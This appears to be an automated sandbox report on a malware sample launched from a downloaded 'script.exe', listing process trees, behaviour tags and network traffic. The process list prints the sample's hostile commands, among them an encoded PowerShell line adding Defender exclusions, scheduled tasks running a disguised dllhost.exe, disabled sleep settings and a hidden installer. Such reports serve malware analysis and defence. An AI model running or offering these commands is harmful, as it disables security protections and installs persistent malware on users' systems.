PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\raid macro3.rec"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.0.269596496\400488784" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1724 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e7514f3-0a74-4baf-bbee-77021640ec0d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 1812 238528d5458 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.1.1200488976\555917829" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f4ef632-b6fd-4f9c-b836-35735f74ae12} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 2168 23847672858 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.2.1940952481\870191388" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2900 -prefsLen 21120 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e8397f2-f0c4-466b-9798-a6d1a9e673aa} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 2872 238569dab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.3.1497963375\1772696126" -childID 2 -isForBrowser -prefsHandle 2780 -prefMapHandle 3112 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf266881-0160-49d6-b41b-c6d08872a10c} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 3540 2384766ae58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.4.62216990\50109511" -childID 3 -isForBrowser -prefsHandle 4328 -prefMapHandle 4320 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f138c98-9c71-4d1b-92fb-36b13d592df9} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4340 23858a7da58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.5.381186738\181415041" -childID 4 -isForBrowser -prefsHandle 4944 -prefMapHandle 4912 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9efae3e7-0dcb-4f57-89e7-4933bef3098f} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4968 23858ed5e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.6.1526742387\1380066309" -childID 5 -isForBrowser -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40907346-ec57-480e-b94f-32f8952b5f0d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5092 23858ed5b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.7.1352111730\507516753" -childID 6 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {137fdb02-b72c-410e-935c-f686d081bbff} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5360 23858ed6458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.8.46948688\751609490" -childID 7 -isForBrowser -prefsHandle 5684 -prefMapHandle 7588 -prefsLen 26964 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ca92268-ad25-4bda-a7c4-b7b204534f26} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5880 23852bb1158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.9.1167411704\1051564531" -childID 8 -isForBrowser -prefsHandle 9608 -prefMapHandle 7512 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ef4f47a-e5a0-410d-8f53-d52cbd8afc01} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9660 2385b2f8e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.12.602268020\1415154968" -childID 11 -isForBrowser -prefsHandle 9576 -prefMapHandle 9572 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {346bd408-2372-480e-9ecb-0e66f3fab29d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9588 2385b94e458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.11.1629046242\1900873324" -childID 10 -isForBrowser -prefsHandle 5264 -prefMapHandle 5268 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f2f427d-6c20-4666-9902-86b6dd2be0f8} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5928 23859cd6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.10.77539297\340454085" -childID 9 -isForBrowser -prefsHandle 5400 -prefMapHandle 9708 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1eb4124e-2f90-4a52-96b8-439f5addfe7e} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7288 23859cd3b58 tab

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\fontview.exe

"C:\Windows\System32\fontview.exe" C:\Users\Admin\Downloads\BackupResume.ttc

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.13.663085724\2045944842" -childID 12 -isForBrowser -prefsHandle 7316 -prefMapHandle 5192 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {51d76c98-2750-4439-8f37-d8226b7002d0} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7084 238585c6258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.14.31080208\218512396" -parentBuildID 20221007134813 -prefsHandle 5832 -prefMapHandle 5844 -prefsLen 27331 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c84df9a5-c3a8-411d-84c1-7efe1fd0e33e} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4524 2385ac3ce58 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.15.1474240222\1777299193" -childID 13 -isForBrowser -prefsHandle 6860 -prefMapHandle 6864 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {273b4a3d-eb81-4975-9258-c09c6cdfdb86} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6848 2385a8f2158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.16.2137646680\355959901" -childID 14 -isForBrowser -prefsHandle 7492 -prefMapHandle 7172 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d6cd96-9acc-48d5-b346-0e76ddb584ad} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7352 23856946b58 tab

C:\Users\Admin\Downloads\7z2301-x64.exe

"C:\Users\Admin\Downloads\7z2301-x64.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\script\" -ad -an -ai#7zMap9224:74:7zEvent10764

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p7366415912571278752813224456 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADEAbQAyAEEAeABSAGwAUgBjADgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAMgAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AQgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAFcAdAAxADEASAAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADEAbQAyAEEAeABSAGwAUgBjADgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAMgAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AQgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAFcAdAAxADEASAAjAD4A"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6312" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6312" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.17.149320452\431994016" -childID 15 -isForBrowser -prefsHandle 7084 -prefMapHandle 7092 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07c8f60b-5a96-4fdf-bb1c-52c0693621cd} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5856 23853c57558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.18.287542698\1867666559" -childID 16 -isForBrowser -prefsHandle 6928 -prefMapHandle 9584 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dcf6c6d-c5f0-4939-88ba-4c7265995520} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7072 23853988b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.20.1021561729\1820366478" -childID 18 -isForBrowser -prefsHandle 6692 -prefMapHandle 6716 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65738230-3750-47a0-9684-4795dc490d71} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6684 2385a497e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.19.1117803994\1963684542" -childID 17 -isForBrowser -prefsHandle 6592 -prefMapHandle 6852 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2c87520-0973-4fdb-a80c-ccb2f6bc7f47} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7096 23852bc5458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.21.410543759\292343130" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5236 -prefMapHandle 5260 -prefsLen 27362 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca3165e-8843-46c3-b321-7e76fb03e76f} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6960 2385aa2d458 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.22.898733133\1282317683" -childID 19 -isForBrowser -prefsHandle 6396 -prefMapHandle 7588 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8baa9990-6cf0-4c89-86b6-e298df8de81c} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7400 2385ae09958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.23.212465948\1188925951" -childID 20 -isForBrowser -prefsHandle 3748 -prefMapHandle 9176 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {634de901-fac5-4acf-99d5-66b6ac98744d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 3736 23852bb0b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.24.1034059912\1179834464" -childID 21 -isForBrowser -prefsHandle 6744 -prefMapHandle 6840 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c72ea8ad-080a-4f87-98b4-89775d80d975} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6844 23852bc5458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.25.1230792848\1535693830" -childID 22 -isForBrowser -prefsHandle 8900 -prefMapHandle 5616 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e439fc2-968c-4a76-ade3-53ad5569be96} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9036 2385b7ddd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.26.428696652\547309211" -childID 23 -isForBrowser -prefsHandle 6944 -prefMapHandle 9544 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9896f498-5c26-4c38-afff-ba04755dc0c2} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4696 23854f5eb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.27.1438955387\78141468" -childID 24 -isForBrowser -prefsHandle 6652 -prefMapHandle 8832 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {814dcea2-42fc-4781-8d61-3add77ef9239} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6400 23854fc7258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.28.2141684260\1079199814" -childID 25 -isForBrowser -prefsHandle 6852 -prefMapHandle 8908 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2de653d0-582e-4591-ad31-8e3e6857e6d3} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6408 2385398be58 tab

Network

Country Destination Domain Proto
N/A 127.0.0.1:49762 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 54.185.202.81:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.65.55:443 push.services.mozilla.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 221.5.120.34.in-addr.arpa udp
US 8.8.8.8:53 81.202.185.54.in-addr.arpa udp
N/A 127.0.0.1:49768 tcp
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.54.48:443 www.mediafire.com tcp
US 8.8.8.8:53 www.mediafire.com udp
US 8.8.8.8:53 www.mediafire.com udp
US 8.8.8.8:53 48.54.16.104.in-addr.arpa udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 8.8.8.8:53 translate.google.com udp
US 8.8.8.8:53 static.mediafire.com udp
NL 142.250.179.206:443 translate.google.com tcp
NL 142.250.179.206:443 translate.google.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 104.26.7.139:443 btloader.com tcp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 104.16.57.101:443 static.cloudflareinsights.com tcp
US 104.19.214.37:443 cdn.otnolatrnup.com tcp
US 8.8.8.8:53 securepubads46.g.doubleclick.net udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 securepubads46.g.doubleclick.net udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 8.8.8.8:53 cdn.otnolatrnup.com udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 hbopenbid-ams.pubmnet.com udp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.107.148.139:443 prebid.media.net tcp
NL 185.64.189.112:443 hbopenbid-ams.pubmnet.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 hbopenbid-ams.pubmnet.com udp
US 8.8.8.8:53 btlr-us-east-1.sharethrough.com udp
US 8.8.8.8:53 btlr-us-east-1.sharethrough.com udp
NL 142.250.179.206:443 www3.l.google.com udp
NL 142.250.179.206:443 www3.l.google.com udp
US 8.8.8.8:53 translate.googleapis.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 8.8.8.8:53 translate.googleapis.com udp
US 8.8.8.8:53 api.btloader.com udp
US 104.19.214.37:443 cdn.otnolatrnup.com udp
NL 142.250.179.206:443 www3.l.google.com tcp
US 8.8.8.8:53 translate.googleapis.com udp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 8.8.8.8:53 otnolatrnup.com udp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 104.19.215.37:443 otnolatrnup.com tcp
